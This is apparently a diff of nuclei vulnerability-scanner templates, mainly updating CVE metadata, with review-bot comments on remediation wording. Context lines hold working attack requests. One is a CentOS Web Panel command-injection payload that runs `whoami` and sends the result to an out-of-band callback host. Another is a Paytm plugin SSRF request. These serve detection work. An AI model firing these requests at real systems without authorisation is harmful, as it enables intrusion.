@@ -38,3 +48,4 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "{{md5(num)}}")' condition: and +# digest: 4b0a00483046022100d97fe9d2af29c15dc73b8a19c1f69016ed9cf31e60a5767759fe6c56ba2601a2022100d80cb2be444aeac965e4c0abdc2f71d2d232416217054298f34b26cd50c7c429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44877.yaml b/nuclei-templates/CVE-2022/CVE-2022-44877.yaml index e9763a5af2..0348ce8bc0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44877.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44877.yaml 
@@ -1,27 +1,38 @@ id: CVE-2022-44877 info: - name: Centos Web Panel - Unauthenticated Remote Code Execution + name: CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution author: For3stCo1d severity: critical description: | - RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests. + CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Upgrade to CentOS Web Panel version 0.9.8.1147 or later to mitigate this vulnerability. 
reference: - https://twitter.com/_0xf4n9x_/status/1612068225046675457 - https://github.com/numanturle/CVE-2022-44877 - - https://nvd.nist.gov/vuln/detail/CVE-2022-44877 - https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386 + - https://nvd.nist.gov/vuln/detail/CVE-2022-44877 + - http://packetstormsecurity.com/files/171725/Control-Web-Panel-7-CWP7-0.9.8.1147-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-44877 cwe-id: CWE-78 + epss-score: 0.97427 + epss-percentile: 0.99935 + cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: control-webpanel + product: webpanel shodan-query: http.title:"Login | Control WebPanel" - verified: "true" - tags: cve,cve2022,centos,rce,kev + tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel -requests: +http: - raw: - | POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1 @@ -33,7 +44,7 @@ requests: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "dns" @@ -48,7 +59,8 @@ requests: extractors: - type: regex - part: interactsh_request group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + part: interactsh_request +# digest: 4a0a004730450220251a5e0fed581fcfeb62eda5c7320913dc45d41e9d3a17e40ff963b7ec6bf7bb022100a851f4d7f5205ec1dc955bdd0d285e0d7e380efde8ac49d3dec58ed7a677db6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44944.yaml b/nuclei-templates/CVE-2022/CVE-2022-44944.yaml index 3b84cdd14d..a969924eae 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44944.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44944.yaml 
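Review bot: The comment on the retouched line in the `@@ -33,7 +44,7` hunk, `part: interactsh_protocol # Confirms the HTTP Interaction`, contradicts the matcher beneath it, whose `words:` entry is `"dns"` — this check confirms a DNS callback, not an HTTP one. Since the line is already being edited for whitespace, correct it to `part: interactsh_protocol # Confirms the DNS interaction`. The matchers block continues outside this hunk.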
@@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44944 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.37842 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated http: - raw: @@ -65,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100bcfc64344173510396d8256fff3943ba4363370e25850f503147cfa48dbfb453022008cea9ca8b570f7bc2d7687644c6732fec5d7e56692fa72ef2a9b456229d1533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f7c5ec782c15c9e2283d7a395b38639394668e4926e5256f17bd15c01a48b550220733ea68014deaa76cd6eb149fa40f8dc6cc38bbc1686f370c683bca1e7b15c5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44946.yaml b/nuclei-templates/CVE-2022/CVE-2022-44946.yaml index f5af6b3447..c04b5a31c7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44946.yaml 
+++ b/nuclei-templates/CVE-2022/CVE-2022-44946.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44946 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.38539 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100dad5ead68521a5694c091776658b1f9465dd0832ee819d5b94cd23d1b707011b022100f5eddc1ab65709f6be4ff7e9b4be89401b05cf11307780ce8ba532232ee0be27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022024f1b4397b5259096b3834d56e20ade3350323ef4131fb0cc5c225ad63dedfc3022022204d8791d85002284c41b635deb56440af75f6fbe8bc85afaac26ed3589e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44947.yaml b/nuclei-templates/CVE-2022/CVE-2022-44947.yaml index 24df3408d7..c7a0067ab7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44947.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44947.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: 
@@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44947 cwe-id: CWE-79 - epss-score: 0.00221 - epss-percentile: 0.60147 + epss-score: 0.00109 + epss-percentile: 0.43483 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated http: - raw: @@ -65,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100b015de38f6a576fcb1d6bf9e1ab44fac05236112e36cda92ee916fa41d574643022100f8134d3aaef4d68ee4dcffc890dd7efcd2f1c52db0ece4bf742e79601c16bead:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078e8f384c073f04187e7ecaa23493ea0407fa54e1c570bdc4a4c07f2c0e0aeb7022100c361072086badba50693529add0141de6f5fd89d5d8575733ec9c8add9f81bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44948.yaml b/nuclei-templates/CVE-2022/CVE-2022-44948.yaml index 4d0bf4ae08..0aed280f8d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44948.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44948.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44948 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.38514 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -64,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022074a80f2f365d11eff5662d311fac8aa8d0bca9d7c18c51c40fa7738952b9876a022100a9a40e0ff113d9c361c1f9164cc563586f8f5680e9942cde1d8fc3a4bd357a99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b6515306a5ef9306b7d686e82462ce1df63dce1c25583df5601045b4cf4a31d022078af5b19991d9970bb152e4c5a8568dd4bfc3f29ea04e457305f13211933789f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44949.yaml b/nuclei-templates/CVE-2022/CVE-2022-44949.yaml index fc8ab20bf1..0360fbb3cf 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44949.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44949.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44949 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.37842 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -132,4 +134,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 490a00463044022050450e2f2e9db2a6781a697bf36ab6c5cdc5caf1071f182c6d3303303dfecaee02203a2229a5c228a22f3c2399e1c733237f8836dc32d11fa072822e79151b461a30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022037ac8cfd48d6e676a3f4070803b999e42015a084c80c82903af299f909a3f4c0022100d3e3d7588abcfac6a671c786adbb650b7df45706ff32d77b8cd302a48ee9b9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44950.yaml b/nuclei-templates/CVE-2022/CVE-2022-44950.yaml index aa1bc48c95..c6c75dba21 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44950.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44950.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44950 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.37842 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -132,4 +134,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 490a0046304402201b6551aa04e62ecc2bb75c9be14b2b521b1e67caf84360763cd77ffd2b2bc637022056f66d34f2999d5083e5de4a84f96c045d50005025a1b50bb5e2c4565ccee545:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001a28e54084dcf3166039fad4b05645b273c717120b1d20a00477f3fef70fe2d022100b25e6ef84ecf7425a03c0eb0b95ee1e0c051e5d3e099755d74b83057bc955aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44951.yaml b/nuclei-templates/CVE-2022/CVE-2022-44951.yaml index 9086539b94..6e5a05dfbc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44951.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44951.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44951 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.37842 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100cf56ee975068f2decb23cf9e32884af533e0aa6e3d24fc09d2a1bc6f6384495f022070c8ceeebf2a9bc99e05d478478d274e0e55ead714458ae7fbe68cad62b18cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6a6e75d3fcbeefb7bfe70fa11407ec0b7055b0830115dccaed3687cde983b03022100cb450ef92e316a1a23d3173d3838b7b51de7154dc44f3b963cda8866e4e95e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44952.yaml b/nuclei-templates/CVE-2022/CVE-2022-44952.yaml index 13934010bf..1fbf828fb0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44952.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44952.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44952 cwe-id: CWE-79 - epss-score: 0.13545 - epss-percentile: 0.95044 + epss-score: 0.07295 + epss-percentile: 0.93905 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -145,4 +147,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 4a0a00473045022100e2f4d0fe89c851b46259b0c03f98f87d8bbe92273b617b5b335b5f7a73a5c2390220647d6169db99933cf4a2e52a12c81ae9e3287185d235f1fffa6903bb3832a38f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202de06b8a6e888b2993c09a60cfd35c2c48341bc45d7140638b7da6a9f927e15c02205443f1e3d88ae7dca53733dc34930bd1491cd200d6b944d53412de96d56c8bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44957.yaml b/nuclei-templates/CVE-2022/CVE-2022-44957.yaml index be6084c53a..d6cae7559b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44957.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44957.yaml 
@@ -16,15 +16,15 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44957 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.37842 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: webtareas_project product: webtareas - tags: cve,cve2022,xss,webtareas,authenticated,intrusive + tags: cve,cve2022,xss,webtareas,authenticated,intrusive,webtareas_project http: - raw: @@ -168,4 +168,4 @@ http: regex: - 'name="csrfToken" value="([0-9a-zA-Z]+)"' internal: true -# digest: 4a0a00473045022100af9a35237502f9454e9d2aa9f21b65787f52496aa6f0a7012cae4bb86ad235ab022057d590e56ba2b75446c1142b9bbc63a596a54fc6447663b1753f17e8bbd32f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058e04c959164a6887128bff5e2c81ff9a549a4941e0adc621d267e956d6d1fe1022100d36b02df2b82b6dd9d1065d82767ab1ec79b2649450f25d69ecffca80b581608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45037.yaml b/nuclei-templates/CVE-2022/CVE-2022-45037.yaml index 5c1f4c144a..b6bf794878 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45037.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45037.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of WBCE CMS or apply the necessary patches provided by the vendor to fix the Cross Site Scripting vulnerability. reference: 
@@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-45037 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.3585 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true @@ -101,4 +103,4 @@ http: - 'name="username_fieldname" value="(.*)"' internal: true part: body -# digest: 4b0a00483046022100c91585882c3d26fbb93f4e94ce4f6dff0166c89728f922238cc537ba2f7f5c0d022100d150a1d012549bfe1e443a39abfddc276e01682de3efb2d83ca784ff5b74442f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200bbd80622f1f04490521053deeca5606b0a210f7653053a685aaa4abce0fca8402204d4cd83e2003265d8894d8f57d458ccb79a94b581644b8968eb1b268fbb063b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45038.yaml b/nuclei-templates/CVE-2022/CVE-2022-45038.yaml index bb06d84e01..3d239db9e3 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45038.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45038.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of WBCE CMS or apply the necessary security patches provided by the vendor. reference: 
@@ -17,15 +19,15 @@ info: cvss-score: 5.4 cve-id: CVE-2022-45038 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.3585 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: wbce product: wbce_cms - tags: cve,cve2022,xss,wbce,cms,authenticated + tags: cve2022,cve,xss,wbce,cms,authenticated http: - raw: @@ -101,4 +103,4 @@ http: - 'name="app_name" value="(.*?)"' internal: true part: body -# digest: 4a0a00473045022100b3d37ba6cd061547b44cb8ce77b6bfe356e4740b8447c372dc5c900a230b385c0220138d665fe4c0aa98752f8d9a48c15f4e424fd209fa916b9061777551fa866c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220236c2ea7a5a87ab71674dcbc6b934a4397029b3d326ba6f7e3a9a51beacb9a94022066f22477022e34bd8d4bd31f88af1c31eae3632e616489ed4c7763b4ea2aaa8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45354.yaml b/nuclei-templates/CVE-2022/CVE-2022-45354.yaml index b019bb348e..1a67257e6a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45354.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45354.yaml 
@@ -3,19 +3,33 @@ id: CVE-2022-45354 info: name: Download Monitor <= 4.7.60 - Sensitive Information Exposure author: DhiyaneshDK - severity: medium + severity: high description: | The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords) + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks or unauthorized access. remediation: | Update to the latest version of the Download Monitor plugin (4.7.60) or apply the provided patch to fix the vulnerability. reference: - https://github.com/RandomRobbieBF/CVE-2022-45354 - https://wordpress.org/plugins/download-monitor/ + - https://patchstack.com/database/vulnerability/download-monitor/wordpress-download-monitor-plugin-4-7-60-sensitive-data-exposure-vulnerability?_s_id=cve + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-45354 + epss-score: 0.00408 + epss-percentile: 0.73349 + cpe: cpe:2.3:a:wpchill:download_monitor:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 + vendor: wpchill + product: download_monitor + framework: wordpress shodan-query: html:"/wp-content/plugins/download-monitor/" - tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp + tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp http: - method: GET 
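Review bot: The hunk raises `severity` to high and adds a `C:H` CVSS vector, yet leaves the contradictory `remediation:` in the same `info` block untouched: the name (`<= 4.7.60`) and description ("up to, and including, 4.7.60") mark 4.7.60 as affected, while the remediation tells readers to update "to the latest version of the Download Monitor plugin (4.7.60)", i.e. to a vulnerable release. Replace it with `Update the Download Monitor plugin to <first fixed version> or later.` with the real version filled in. Of the two added references, the Patchstack entry is CVE-specific but `https://github.com/nomi-sec/PoC-in-GitHub` is a repository-wide index rather than a source for this CVE and is better dropped. The `http:` request block continues outside this hunk.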
@@ -39,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202b5c87ca1023260f4efdf189c9853d10e43d226515063195b6b48f7f72d486f1022063ca220113fa902ef786d71ab90b4fb066f810430711acbad5b73287cff1da6e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206621ba65377b37becb2284647d51d4fe5423206a1ad56f63d7415c1fc1df85b602205154d8ffe0a0ab0837dcfabe75991d8434b2c1787f71eedbb5faad326966cc53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45362.yaml b/nuclei-templates/CVE-2022/CVE-2022-45362.yaml index f35ee0a085..f2b0a0fa05 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45362.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45362.yaml 
@@ -1,29 +1,41 @@ id: CVE-2022-45362 info: - name: Paytm Payment Gateway Plugin <= 2.7.0 Server Side Request Forgery (SSRF) + name: WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery author: theamanrawat - severity: high - description: | - Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information. + severity: medium + description: WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Paytm Payment Gateway plugin (2.7.0) or apply the vendor-supplied patch. 
reference: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability - https://wordpress.org/plugins/paytm-payments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45362 + - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 cve-id: CVE-2022-45362 + cwe-id: CWE-918 + epss-score: 0.00177 + epss-percentile: 0.54919 + cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:* metadata: verified: true + max-request: 1 + vendor: paytm + product: payment_gateway + framework: wordpress tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm -requests: +http: - raw: - | GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word part: interactsh_protocol @@ -38,3 +50,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100a606fdab9141a48eca5d7f8c40acd7f3ba3028d4d72dc00349a20faed5122a37022100b040277863f3df37d504e8dd431bd931484d0f7c9344cc658e8926bf3b62cb23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45365.yaml b/nuclei-templates/CVE-2022/CVE-2022-45365.yaml index 3331e819c8..7918ee902b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45365.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45365.yaml 
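Review bot: The new remediation says to update to 2.7.0, yet the rewritten description states the plugin "through 2.7.0" is vulnerable, so the two lines contradict each other in the same way as the Download Monitor template earlier in this commit. Reword it as `Update the Paytm Payment Gateway plugin to a release later than 2.7.0 (see the Patchstack advisory for the fixed version).` The severity change to medium agrees with the new cvss-score of 6.5, and `matchers-condition: and` is added while the matcher list continues outside the hunk.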
@@ -12,16 +12,23 @@ info: - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability - https://wordpress.org/plugins/stock-ticker/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45365 + - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-45365 cwe-id: CWE-79 + epss-score: 0.00064 + epss-percentile: 0.26193 + cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:* metadata: verified: "true" max-request: 1 + vendor: urosevic + product: stock_ticker + framework: wordpress publicwww-query: "/wp-content/plugins/stock-ticker/" - tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss + tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss http: - raw: @@ -49,5 